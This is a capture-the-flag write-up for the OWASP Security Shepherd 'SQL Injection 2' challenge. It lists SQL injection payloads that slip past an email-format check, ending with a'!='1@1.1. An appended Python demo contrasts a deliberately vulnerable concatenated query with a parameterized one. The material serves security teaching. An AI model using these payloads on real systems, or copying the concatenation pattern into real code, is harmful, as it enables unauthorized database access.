OWASP Security Shepherd Project - SQL Injection 2 (Injection Challenge)
Challenge
Solution
Once again, let's try the most classic input a'or'1'='1. It seems that the application does check whether the user input is in a certain format.
We need to see whether we can input something that looks like an email address but still tricks the SQL server.
Try a@'or'1.com'='1.com => Invalid Email Address was submitted
1@1.1 => There were no results found in your search
Now we know 1@1.1 is a valid format.
Try 1@1.1'or'1'='1 => Invalid Email Address was submitted
1'or'a@a.a => There were no results found in your search
Now we know the @ character should be placed in the last clause.
By the way, 1'or'1@1.1 will succeed. I guess that is because @ is recognized as a special character and 1 means true.
Try 1'or'1@1.1'='1@1.1 => Invalid Email Address was submitted
Now we know no two @ characters are allowed.
Try a'!='1@1.1 =>
Great! We completed the challenge.
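The write-up shows that an "is this an email address?" check is not an injection defence: the quote characters that matter to SQL are still accepted in the local part. The following added example (not part of the original post and not Security Shepherd's code) approximates the observed filter with a regular expression inferred from the accepted and rejected inputs above, then runs the same search against a constructed SQLite table twice: once with string concatenation, once with a parameterized query. The regex, the table and its rows are assumptions made for the demonstration.

```python
import re
import sqlite3

# Assumed approximation of the challenge's email check, inferred from the
# inputs above: any local part, exactly one '@', and a domain made only of
# letters, digits, dots and hyphens. This is a guess, not the real filter.
EMAIL_RE = re.compile(r"^[^@]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

REJECTED = "Invalid Email Address was submitted"


def looks_like_email(value: str) -> bool:
    """Format check only: quotes in the local part are still accepted."""
    return EMAIL_RE.fullmatch(value) is not None


def make_db() -> sqlite3.Connection:
    # Constructed sample table standing in for the challenge's customer list.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("Alice", "alice@example.com"), ("Bob", "bob@example.org")],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, email: str):
    """Format check followed by string concatenation.

    The check passes a'!='1@1.1, and the concatenated WHERE clause becomes
    email = 'a'!='1@1.1', which is true for every row.
    """
    if not looks_like_email(email):
        return REJECTED
    sql = "SELECT name FROM customers WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, email: str):
    """Same format check, but the value is bound as a parameter, so the
    quotes are data rather than SQL syntax and no row matches."""
    if not looks_like_email(email):
        return REJECTED
    rows = conn.execute("SELECT name FROM customers WHERE email = ?", (email,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for probe in ["a'or'1'='1", "a@'or'1.com'='1.com", "1@1.1", "a'!='1@1.1"]:
        print(repr(probe), "->", search_vulnerable(db, probe),
              "| parameterized:", search_parameterized(db, probe))
```

The format check behaves the same in both functions; only the way the value reaches the database differs, which is why the fix belongs at the query layer rather than in the validator.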
Welcome to share your comments or questions :-)
Enjoy life!